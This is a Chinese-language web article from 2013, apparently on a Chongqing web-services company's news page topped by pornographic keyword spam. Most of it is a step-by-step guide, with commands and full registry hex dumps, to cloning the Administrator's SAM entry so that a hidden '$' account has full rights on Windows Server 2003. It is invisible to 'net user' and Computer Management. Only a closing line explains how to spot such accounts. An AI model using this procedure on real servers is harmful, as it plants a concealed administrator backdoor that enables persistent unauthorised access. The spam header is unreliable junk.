无码色色,久久久久久免费精品喷水,美女把胸罩解开让男生摸,欧美一级在线观看视频,色亚洲天堂,色综合天天综合给合国产

咨詢電話:023-88959644    24小時服務熱線:400-023-8809
NEWS CENTER ·
新聞動態(tài)
關注中技互聯(lián) 關注前沿

如何在Win2003服務器添加隱藏用戶及如何看穿隱藏用戶

發(fā)表日期:2013-05-28    文章編輯:王未    瀏覽次數(shù):191    標簽:

www.tmsmall666.cn

   先建立 cnlnfjhh$ 用戶

  c:\>net user cnlnfjhh$ wrsky /add

  //后面加$ 是為了使在 控制臺下用 net user 看不到.

  然后運行regedt32.exe(注意不是regedit.exe)

  先找到HKEY_LOCAL_MAICHINE\SAM\SAM 點擊它 ,然后在菜單"安全"->"權限" 添加自己現(xiàn)在登錄的帳戶或組,

  把"權限"->"完全控制"->"允許"打上勾,然后確定.

  這樣就可以直接讀取本地sam的信息

  現(xiàn)在運行regedit.exe

  打開鍵 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$

  查看默認鍵值為"0x3f1" 相應導出如下

  HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 為cnlnfjhh$.reg

  HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 為 3f1.reg

  HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 為 lf4.reg (Administrators的相應鍵)

  用記事本打開lf4.reg 找到如下的"F"的值,比如這個例子中如下

  "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

  00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\

  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\

  00,00,00,00,00,00,00

  把其復制后,打開3f1.reg,找到"F"的值,將其刪除,然后把上面的那段粘貼.

  打開aspnet$.reg,把里面的內容,比如這個例子中如下面這段復制

  [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]

  @=hex(3f1):

  回到3f1.reg 粘貼上面這段到文件最后,最后生成的文件內容如下

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]

  "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

  00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\

  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\

  00,00,00,00,00,00,00

  "V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\

  00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\

  14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\

  01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\

  00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\

  00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\

  08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\

  00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\

  00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\

  00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\

  00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\

  00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\

  00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\

  00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\

  00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\

  e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\

  00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\

  00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\

  4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\

  76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\

  ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\

  fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\

  37,f1,02,cf,01,00,01,00,01,00,01,00

  [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]

  @=hex(3f1):

  保存后,將cnlnfjhh$用戶刪除

  c:\>net user cnlnfjhh$ /delete

  運行regedit.exe 將我們已經(jīng)修改好的3f1.reg文件導入.

  最后,打開regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 點擊它 ,然后在菜單"安全"->"權限" 刪除剛才添加的帳號

  然后 注銷當前用戶 用 cnlnfjhh/wrsky 登陸 就會是 最高權限了.

  03克隆的方法和 2000的克隆 略有點區(qū)別 就是我文章的那前一部分.

  這樣就建立了一個在控制臺用 net user 和"計算機管理"中都看不到的帳戶cnlnfjhh$, 記著第一次就把密碼設置好,不要改密碼

  -------------------------------------------------------------------------------

  反之。打開[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names

  users下面的項目跟names下面的項目數(shù)量不一致時(比names下面的多),肯定有內鬼??磏ames項目的鍵值對應users下面的項目名稱,對應不上的話就刪掉吧。

  看到上面這些字符是不是腦袋都大了?中技也覺得,不過確實是有效的方法,多掌握一些別人沒有的知識肯定是對我們建設網(wǎng)站有好處的。

重慶中技互聯(lián)網(wǎng)信息咨詢有限公司 www.tmsmall666.cn

如沒特殊注明,文章均為中技互聯(lián)原創(chuàng),轉載請注明來自www.tmsmall666.cn
相關新聞

CopyrightZJCOO technology Co., LTD. All Rights Reserved.    

渝ICP 備11003429號

  • qq客服
  • 公眾號
  • 手機版
  • 新浪微博